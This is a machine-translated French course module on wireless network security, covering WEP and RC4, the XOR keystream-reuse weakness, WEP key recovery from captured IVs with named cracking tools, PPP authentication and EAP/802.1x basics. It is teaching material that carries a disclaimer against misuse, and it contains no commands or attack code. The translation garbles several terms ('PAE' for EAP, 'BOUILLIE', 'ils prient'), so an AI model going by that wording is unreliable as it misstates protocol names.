0% ont trouvé ce document utile (0 vote)
17 vues66 pages

Module 2

Ce document présente un module sur la sécurité des réseaux sans fil, abordant des protocoles tels que WEP, WPA et WPA2, ainsi que des outils de piratage et des contre-mesures. Les objectifs d'apprentissage incluent la compréhension de l'authentification MAC et la configuration de divers mécanismes de sécurité. Une clause de non-responsabilité souligne que le contenu ne doit pas être utilisé à des fins malveillantes.

Transféré par

Flavio ADANTCHEDE
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
17 vues66 pages

Module 2

Ce document présente un module sur la sécurité des réseaux sans fil, abordant des protocoles tels que WEP, WPA et WPA2, ainsi que des outils de piratage et des contre-mesures. Les objectifs d'apprentissage incluent la compréhension de l'authentification MAC et la configuration de divers mécanismes de sécurité. Une clause de non-responsabilité souligne que le contenu ne doit pas être utilisé à des fins malveillantes.

Transféré par

Flavio ADANTCHEDE
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Machine Translated by Google Présentation

Introduction à la sécurité sans fil Sécurité


sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Module 2 : Protocoles de sécurité des réseaux sans fil : WEP,


Serveur WAP, WPS, AAA

Victor OYETOLA
Éric ATTOU

5 juillet 2023
1/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé
1 Présentation
2 Introduction à la sécurité sans fil 3 Sécurité
sans fil 4 Confidentialité
équivalente filaire (WEP) 5 802.1x et EAP
6 Accès protégé WiFi
(WPA)
7 Piratage WPA
8 Brève sécurité des appareils
Android 9
Sécurité IoT 10 Outils Python pour le piratage et la
sécurité sans fil 11 Atténuation et contre­mesures des attaques
de réseau WiFi 12 Portail captif WiFi (Coovachilli, alcasar, OTP)
2/66
13 Résumé
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Objectifs d'apprentissage
Brève
Concepts clés
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Objectifs du module

Ce module explique les différents protocoles utilisés pour la sécurité sans fil. En terminant
ce module, les étudiants acquerront les compétences suivantes :
compréhension de l'authentification MAC ;
configuration de la sécurité
WEP ; configuration des
protocoles WPA et WPA2 ;
déploiement de l'infrastructure EAP ; configuration et déploiement des
mécanismes de chiffrement (PAP, CHAP, PEAP, MSCHAP).
Configurer et déployer des mécanismes de chiffrement TLS (EAP­TTLS, EAP­
TLS) 3/66

Failles de sécurité WPA Victor PRAISE Eric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Objectifs d'apprentissage
Brève
Concepts clés
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Attention ! Attention ! Attention !

CLAUSE DE NON­RESPONSABILITÉ !

Ce cours a pour objectif de vous expliquer les mécanismes, outils et techniques de sécurité que
vous pouvez utiliser ou déployer pour sécuriser un réseau sous votre administration.
En aucun cas, vous ne pouvez utiliser ce cours pour pénétrer dans un système ou endommager un
réseau sans autorisation. Vous risquez une peine de prison !

Les enseignants déclinent strictement toutes responsabilités en cas de mauvaise utilisation de


notre cours !

4/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Aperçu
Introduction à la sécurité sans fil
Sécurité sans fil
Confidentialité équivalente filaire (WEP)
802.1x et EAP
Accès protégé Wi­Fi (WPA) Objectifs d'apprentissage
Piratage WPA
Concepts clés
Brève sécurité des appareils Android
sécurité de l'IoT
Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau Wi­Fi
Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Concepts clés

Tableau – Concepts clés

WEP WPA
PAE EAP­TLS
BOUILLIE EAP­TTLS
TYPE TLS
MSCHAP basé sur MAC

5/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction
Brève Contexte
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Introduction

Dans le module précédent, nous avons exploré le processus d'association. Par


défaut, même si un point d'accès peut authentifier ses clients, il n'a aucun moyen
de vérifier leur authenticité (c'est­à­dire si le client est fiable ?). La plupart des
points d'accès du marché proposent donc ces paramètres par défaut, et c'est à
vous de configurer votre appareil pour utiliser l'un des différents mécanismes
d'authentification proposés.

6/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction
Brève Contexte
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Contexte

Environnement réseau avec mix de technologies :

technologies de réseaux mixtes


réseau filaire (frontières contrôlées) ;
étendu avec réseau sans fil ;
Le réseau sans fil semble faible et doit être protégé.

Mais que pourrions­nous protéger dans l’infrastructure sans fil ? et comment


mettre en œuvre cette protection ?
7/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction
Brève Contexte
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

contexte

Tous les actifs du réseau doivent être protégés et il existe de nombreuses façons de
déployer leur sécurité.
Vous pouvez choisir de :

Choix de sécurité :
séparez les nœuds de réseau sans fil des nœuds de réseau câblé en
appliquant une liste de contrôle d'accès (pare­feu/VLAN) au nœud en fonction de
sa technologie.
Déployer des solutions VPN
8/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Introduction
Brève Contexte
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

contexte

À première vue, la séparation technologique peut sembler une bonne implémentation de


sécurité, mais une telle implémentation semble faible puisque le même nœud peut en fait avoir
deux cartes réseau (une filaire et une sans fil) et établir un pont entre les deux ; et ainsi accéder
au réseau avec l'une de ses cartes réseau tout en semblant y avoir accédé avec l'autre.

Les solutions VPN nécessitent une infrastructure supplémentaire (serveurs VPN). Elles peuvent
également réduire la bande passante, car tout le trafic doit transiter par un seul serveur VPN.
De plus, elles sont peu pratiques pour les utilisateurs, car ils doivent s'authentifier deux fois.

9/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected Access
(WPA)
Concepts de sécurité sans fil
Brève introduction
Présentation de la sécurité sans fil
au piratage WPA Sécurité des appareils
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Concepts

Concepts de sécurité Wi­Fi Concepts de sécurité Wi­Fi


Authentification : Processus d'identification de la personne NAS : Network Access Server, fournit un point d'entrée réseau
demandant l'accès au réseau. Objectif : profiler le client ; aux nœuds du réseau (stations) ;

Texte en clair : une chaîne lisible par l'homme utilisée comme


Autorisation : Après avoir profilé l'utilisateur, ce processus secret pour accéder au réseau ;
permet de déterminer les privilèges qui s'appliquent à un
Cryptage : processus utilisé pour appliquer une clé à un
utilisateur authentifié ;
texte en clair afin de produire un texte chiffré ;
Comptabilité : Évaluer la consommation des

ressources réseau (Bande passante, temps de connexion, téléchargement, upload...)

d'un utilisateur à des fins de facturation ;

10/66

Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Concepts de sécurité sans fil
Brève introduction
Présentation de la sécurité sans fil
au piratage WPA Sécurité des
appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de réseau
WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Concepts

Concepts de sécurité Wi­Fi Concepts de sécurité Wi­Fi


Chiffrement : une donnée chiffrée résultant d'un texte EAP : Protocole d'authentification extensible
en clair + une clé de chiffrement ;
Portail captif :
RADIUS : service utilisateur d'accès à distance par numérotation
802.1x(dot1.x)
ils prient :...

11/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Concepts de sécurité sans fil
Brève
Présentation de la sécurité sans fil
introduction au piratage WPA
Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Pour répondre aux exigences de sécurité du Wi­Fi, de nombreuses initiatives et techniques


ont été utilisées :

sécurité Wi­Fi
Point d'accès ouvert : c'est l'équivalent de l'absence totale de sécurité,
Confidentialité équivalente à Wired :
WPA
WPA2

WPS

Portail captif

Nous expliquerons le fonctionnement interne de chacune de ces techniques de sécurité 12/66


Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP
L'un des premiers mécanismes de sécurité utilisés sur les réseaux Wi­Fi est le
WEP (Wired Equivalent Privacy). Il s'agit du mécanisme de chiffrement le plus
ancien et sans doute le plus faible. Conçu comme la solution initiale de sécurité sans
fil, il s'est rapidement révélé imparfait et extrêmement vulnérable.

13/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP
Le WEP utilisait certaines techniques de cryptage existantes, notamment RC4, et était à l'origine destiné
à:

vaincre les écoutes clandestines des communications et ;

tentatives visant à réduire la divulgation des données ;

vérifier l'intégrité des données lorsqu'elles circulent sur le réseau ;

utiliser un secret partagé pour crypter les paquets avant la transmission ;

assurer la confidentialité, le contrôle d'accès et l'intégrité dans un système léger et efficace.

14/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP
Malheureusement, ses problèmes proviennent des éléments suivants : il a été conçu sans l'avis
de la communauté universitaire ou du public et les cryptologues professionnels n'ont jamais été
consultés ; il ne fournit aucune méthode clairement définie pour la distribution des clés autres que
les clés pré­partagées ; un attaquant obtenant du texte chiffré et du texte en clair peut analyser
et découvrir la clé, les algorithmes utilisés pour effectuer la planification des clés se sont avérés
vulnérables aux attaques.

Le WEP souffre de nombreux défauts qui le rendent plus facile à compromettre, même par un
attaquant légèrement qualifié.

15/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP
Étant donné que WEP utilise largement les vecteurs d'initialisation (IV : une valeur
aléatoire de 24 bits combinée à un secret partagé pour le cryptage des données).

L' essentiel pour décrypter le protocole WEP est d'intercepter autant de vecteurs d'initialisation
que possible avant de tenter de récupérer la clé. De nombreux utilitaires de décryptage
sont disponibles : Cain & Abel, Aircrack­ng, Airsnort , etc. Le WEP est donc peu sûr, car il est
facile de récupérer la clé de chiffrement.

16/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP

WEP
Une clé WEP s'étend de 40 bits à 104 bits et peut être définie soit

au format hexadécimal ex : f0­b2­93­03­73

au format textuel ex : p9 !7h , BN ?de ou Yi9jk

cette clé est complétée par le vecteur d'initialisation

17/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP

Algorithmes WEP et RC4. Le


chiffrement WEP utilise l'algorithme RC4. Le mécanisme de chiffrement est le suivant :

La clé de chiffrement (K) est convertie en un tableau de 256 octets ;

L'opérateur XOR est appliqué au message d'origine (M) et à la clé (K) pour générer le
chiffrement (C) ;

C=M XOR RC4(K)

18/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP

Algorithme WEP et RC4 Étant


donné que l'algorithme RC4 est un algorithme de cryptage symétrique, on peut récupérer
le message initial à partir du chiffrement si la clé est connue.

M=C XOR RC4(K)

19/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP

Supposons qu’un expéditeur S souhaite envoyer un message M à un récepteur R.


1 S produit une séquence de bits à partir de la clé WEP (K) en utilisant l'algorithme RC4 :RC4(K) ;
2 S calcule le chiffrement C en utilisant le message en clair M comme suit : C=M XOR RC4(K) ;
3 S envoie C ;

4 R reçoit C ; supposons que R connaisse la clé (K)


5 R produit une séquence de bits à partir de la clé WEP (K) en utilisant l'algorithme RC4 :RC4(K) ;
6 R récupère le Message M en utilisant C : M=C XOR RC4(K) ;

20/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP

Algorithme WEP et RC4

21/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction Présentation du WEP

au piratage WPA Sécurité des appareils


Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP

Algorithme WEP et RC4


Considérons maintenant que

L'expéditeur S1 souhaite envoyer un message M1 à un récepteur R1 avec une clé (K)

L'expéditeur S2 souhaite envoyer un message M2 à un récepteur R2 avec une clé (K)


nous avons donc

C1=M1 XOR RC4(K)

C2=M2 XOR RC4(K)

22/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève introduction Présentation du WEP

au piratage WPA Sécurité des


appareils
Android Sécurité IoT Outils Python pour le piratage et la
sécurité sans fil Atténuation et contre­mesures des attaques de réseau
WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

WEP

Algorithme WEP et RC4


Malheureusement, si un attaquant capture C1 et C2, il pourrait calculer :

1 C1 OU exclusif C2 ;

2 (M1 XOR RC4(K) ) XOR (M2 XOR RC4(K) ) ;

3 (M1 OU exclusif M2 ) OU exclusif (RC4(K) OU exclusif RC4(K) ) ;

4 (M1 XOR M2 ) ;

5 R produit une séquence de bits à partir de la clé WEP (K) en utilisant l'algorithme RC4 :RC4(K) ;

6 R récupère le Message M en utilisant le texte chiffré C comme suit : M=C XOR RC4(K) ;

23/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Authentification WEP

authentification WEP
Tout client demandant une association avec un point d'accès doit s'authentifier
auprès de ce dernier. Il envoie d'abord une requête d'authentification
avec son adresse MAC. Si le point d'accès est configuré avec l'authentification WEP,
il envoie un message de confirmation (un texte de 128 caractères) au client. Ce
dernier doit chiffrer ce message avec sa clé WEP et le renvoyer au point d'accès.

À la réception de la réponse du client, le point d'accès la déchiffre pour vérifier sa


conformité au défi. Si tel est le cas, le client est associé au point d'accès.
24/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA)
Brève Présentation du WEP

introduction au piratage WPA


Sécurité des
appareils Android Sécurité IoT Outils Python pour le
piratage et la sécurité sans fil Atténuation et contre­mesures des
attaques de réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Faiblesses du WEP

Voici les faiblesses dont souffre le WEP :

Faiblesses du WEP
Dictionnaire de

répétition des touches

25/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Brève introduction Notions de base du PAE

au piratage WPA Sécurité des Composants du PAE


appareils
Android Sécurité IoT Outils Python pour le piratage et
la sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Présentation du PAE

Nous avons discuté jusqu'à présent de différents mécanismes de sécurité :


Contention RF

emplacement AP sécurisé

filtrage des adresses Mac des clients

Masquage SSID

cryptage WEP

Même si chacune de ces techniques offre une certaine sécurité, elles semblent toutes deux limitées.

26/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Brève introduction Notions de base du PAE

au piratage WPA Sécurité des Composants du PAE


appareils
Android Sécurité IoT Outils Python pour le piratage et
la sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Présentation du PAE

Pour surmonter les limitations de sécurité observées avec ces mécanismes, l'IETF spécifie
et introduit une batterie de protocoles appelés 802.1x basés sur EAP.
Comprendre la norme 802.1x nécessite de comprendre le protocole EAP. Or, le protocole EAP lui­même
provient de :

PPP : Protocole point à point

27/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Brève introduction Notions de base du PAE

au piratage WPA Sécurité des Composants du PAE


appareils
Android Sécurité IoT Outils Python pour le piratage et
la sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

Protocole PPP

Avec le protocole point à point, un client souhaitant accéder à Internet utilise son modem pour
se connecter à une ligne distante. Cette connexion permet d'établir une connexion entre le
modem client et un modem distant situé au point de présence. Pour établir la connexion, le
client doit révéler son identité en fournissant simplement un mot de passe fourni par le
fournisseur d'accès.

28/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Brève introduction Notions de base du PAE

au piratage WPA Sécurité des Composants du PAE


appareils
Android Sécurité IoT Outils Python pour le piratage et
la sécurité sans fil Atténuation et contre­mesures des attaques de
réseau WiFi Portail captif WiFi (Coovachilli, alcasar, OTP)
Résumé

PPP

PPP

29/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected Access
(WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Mécanismes d'authentification du protocole PPP

PPP définit 4 mécanismes d'authentification par mot de passe :

01­Mécanismes d'authentification PPP 02­Mécanismes d'authentification PPP


PAP : Protocole d'authentification par mot de passe où le client MSCHAP­v1 : Introduit par Microsoft. Similaire à CHAP, mais
envoie le mot de passe en clair au lieu de stocker le mot de passe en clair, il est haché avant
d'être stocké sur le serveur.
CHAP : Protocole d'authentification par poignée de main
serveur
(Challenge Handshake Authentication Protocol) utilisant
l'algorithme MD5 pour hacher le mot de passe. Cependant, il MSCHAP­v2 : Une version améliorée de MSCHAP qui corrige les
nécessite que le mot de passe soit stocké en clair sur le serveur. faiblesses découvertes dans la v1

30/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif WiFi
(Coovachilli, alcasar, OTP)
Résumé

Limitations du PPP

Malgré ses mécanismes d'authentification, PPP semble trop limité car :

De plus, les fournisseurs d’accès à Internet se plaignent :

01==> Limites du PPP


Le PAP n'est pas sécurisé,
02==> Limites du PPP
CHAP, MSCHAP­v1 et MSCHAP­v2 sont tous deux vulnérables ne pouvant pas authentifier leurs utilisateurs avec

aux attaques par dictionnaire


technologies supplémentaires :

carte à puce ;
certificat électronique
D’où la nécessité du PAE.
31/66

Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

Notions de base du PAE

PAE 802.1x, WPA2­Enterprise


EAP signifie Extensible Authentication Protocol et est un cadre 802.1x et WPA2­Enterprise sont des normes industrielles utilisées pour la
d'authentification. sécurité des points d'extrémité.

802.1x utilise EAP sur LAN (EAPOL) ;

WPA2­Enterprise utilise EAP sur le réseau Wi­Fi


(EAPOW)

Comprendre le PAE
Une compréhension de base d’EAP comprend la connaissance de la manière dont le demandeur, l’ authentificateur et le serveur d’authentification principal interagissent.

32/66
Victor OYETOLAÉric ATTOU Module 2 : Protocoles de sécurité des réseaux sans fil : WEP, WAP,
Machine Translated by Google Présentation
Introduction à la sécurité sans fil Sécurité
sans fil Wired
Equivalent Privacy (WEP) 802.1x et EAP
WiFi Protected
Access (WPA) Protocole PPP
Notions de base du PAE
Brève introduction
au piratage WPA Sécurité des appareils Composants du PAE
Android Sécurité
IoT Outils Python pour le piratage et la sécurité sans fil
Atténuation et contre­mesures des attaques de réseau WiFi Portail captif
WiFi (Coovachilli, alcasar, OTP)
Résumé

EAP se compose de 3 composants : authentificateur, demandeur, serveur AAA

ils prient Authentificateur


